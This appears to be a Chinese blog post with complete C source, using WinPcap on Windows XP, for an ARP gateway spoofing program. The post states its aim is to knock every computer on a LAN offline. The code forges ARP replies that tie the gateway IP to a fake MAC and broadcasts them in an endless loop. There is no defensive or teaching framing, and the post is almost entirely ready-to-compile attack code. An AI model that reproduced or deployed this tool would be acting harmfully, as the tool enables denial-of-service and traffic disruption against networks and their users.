ARP閘道器欺騙程式的實現(vs2008 winpacp)
阿新 • • 發佈:2019-02-16
向區域網傳送ARP應答包,向區域網所有主機發送錯誤的閘道器MAC地址,這樣所有的計算機都不能上網了
原始碼
環境 :windows xp ,vs2008,安裝winpacp
開發包:winpacp
字符集:ASCII
#define WINVER 0x5001 //win xp #define HAVE_REMOTE #include <stdio.h> #include <pcap.h> #include <Packet32.h> #include <windows.h> #include <shlwapi.h> #pragma comment(lib,"shlwapi.lib") #pragma comment(lib,"wpcap.lib") #pragma comment(lib,"Packet.lib") #define EPT_IP 0x0800//IP協議 #define EPT_ARP 0x0806//ARP協議 #define EPT_RARP 0x8035// RARP協議 #define ARP_HARDWARE 0x0001/802.3 乙太網 #define ARP_REQUEST 0x0001 //ARP 請求 #define ARP_REPLY 0x0002// ARP 應答 #define Max_Num_Adapter 10 #pragma pack(push, 1) typedef struct ehhdr { unsigned char eh_dst[6]; //目標MAC地址 unsigned char eh_src[6]; //源MAC地址 unsigned short eh_type; //幀型別 } EHHDR, *PEHHDR; typedef struct arphdr { unsigned short arp_hrd; //hardware unsigned short arp_pro; //protocol unsigned char arp_hln; //6 unsigned char arp_pln; //4 unsigned short arp_op; //ARP/RARP選項 unsigned char arp_sha[6]; //傳送者MAC unsigned long arp_spa; //傳送者IP unsigned char arp_tha[6]; //目標MAC unsigned long arp_tpa; //目標IP }ARPHDR, *PARPHDR; //獲得MAC void GetMacAddr(char *MacAddr,unsigned char *pbuff) { char temp[5]="0x\0\0"; char *temp_1=temp+2; int n; for(int i=0;i<12;i+=2) { memcpy(temp_1,MacAddr,2); StrToIntEx(temp,STIF_SUPPORT_HEX,&n); pbuff[i/2]=(unsigned char)n; MacAddr+=2; } } //ARP包結構 typedef struct arpPacket { EHHDR ehhdr; ARPHDR arphdr; } ARPPACKET, *PARPPACKET; #pragma pack(pop) int main() { static char AdapterList[Max_Num_Adapter][1024]; char szPacketBuf[600]; LPADAPTER lpAdapter; LPPACKET lpPacket; char AdapterName[2048]; char *temp, *temp1; ARPPACKET ARPPacket; ULONG AdapterLength = 1024; int AdapterNum = 0; int nRetCode, i; //獲得介面卡列表 if (PacketGetAdapterNames(AdapterName, &AdapterLength) == FALSE) { printf("不能獲得介面卡列表!\n"); return 0; } //處理介面卡名 temp = AdapterName; temp1 = AdapterName; i = 0; while ((*temp != '\0') || (*(temp - 1) != '\0')) { if (*temp == '\0') { memcpy(AdapterList[i], temp1, (temp - temp1)); temp1 = temp + 1; i++; } temp++; } AdapterNum = i; for (i = 0; i < AdapterNum; i++) printf("\n%d- %s\n", i + 1, AdapterList[i]); printf("請輸入介面卡的序號:"); int nSelect; scanf("%d",&nSelect); //開啟介面卡 lpAdapter = (LPADAPTER)PacketOpenAdapter(AdapterList[nSelect-1]); if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) { nRetCode = GetLastError(); printf("不能開啟驅動,錯誤碼為: %lx\n", nRetCode); return 1; } //分配包記憶體 lpPacket=PacketAllocatePacket(); if (lpPacket == NULL) { printf("錯誤:分配包記憶體空間失敗!\n"); return 2; } ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); GetMacAddr("28C0DA06EC84",ARPPacket.ehhdr.eh_src);//源MAC地址 GetMacAddr("FFFFFFFFFFFF",ARPPacket.ehhdr.eh_dst);//MAC廣播 ARPPacket.ehhdr.eh_type=htons(EPT_ARP); ARPPacket.arphdr.arp_hrd=htons(ARP_HARDWARE); ARPPacket.arphdr.arp_pro=htons(EPT_IP); ARPPacket.arphdr.arp_hln=6; ARPPacket.arphdr.arp_pln=4; ARPPacket.arphdr.arp_op=htons(ARP_REPLY); GetMacAddr("28C0DA06EC88",ARPPacket.arphdr.arp_sha);//()傳送者MAC,假的 ARPPacket.arphdr.arp_spa=inet_addr("114.213.68.1");//閘道器IP GetMacAddr("FFFFFFFFFFFF",ARPPacket.arphdr.arp_tha);//廣播MAC ARPPacket.arphdr.arp_tpa=inet_addr("255,255,255,255");//廣播IP memcpy(szPacketBuf, (char*) &ARPPacket, sizeof(ARPPacket)); PacketInitPacket(lpPacket, szPacketBuf, 60);//初始化包 if (PacketSetNumWrites(lpAdapter, 2) == FALSE) { printf("警告: Unable to send more than one packet in a single write ! \n "); getchar(); } //不停傳送ARP欺騙包 while(true){ if (PacketSendPacket(lpAdapter, lpPacket, TRUE) == FALSE) { printf("Error sending the packets!\n"); getchar(); return 3; } } printf("Send ok!\n"); //關閉包並退出 PacketFreePacket(lpPacket); PacketCloseAdapter(lpAdapter); scanf("%d",&i); return 0; }